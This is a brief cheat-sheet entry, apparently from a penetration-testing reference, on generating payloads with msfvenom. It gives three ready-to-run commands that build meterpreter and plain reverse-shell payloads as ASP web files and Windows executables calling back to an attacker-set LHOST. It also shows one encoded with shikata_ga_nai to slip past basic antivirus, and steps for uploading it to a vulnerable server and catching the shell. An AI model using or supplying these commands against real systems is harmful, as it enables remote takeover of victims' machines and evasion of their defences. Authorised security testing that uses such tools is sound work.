Generate Payloads with msfvenom
exploitationtool
Summary
Build reverse-shell / meterpreter payloads in various formats (asp, exe) with msfvenom, optionally encoding to evade simple AV.
Walkthrough
msfvenom generates standalone payloads (meterpreter or plain reverse shells) in whatever format the target accepts.
Steps
- Generate a web payload (e.g.
.asp) for upload to a vulnerable web server. - Produce an encoded x86 executable with
-i 10 -e x86/shikata_ga_naito obfuscate the payload against basic detection. - Build a simple x64 reverse-shell
.exewhen you just need a non-meterpreter callback. - Set
LHOST/LPORTto your listener and catch the connection with a matching handler or Netcat.
Commands
bash
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -f asp > shell.asp
bash
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=1234 -i 10 -e x86/shikata_ga_nai -f exe > shell.exe
bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=8220 -f exe -o revshell.exe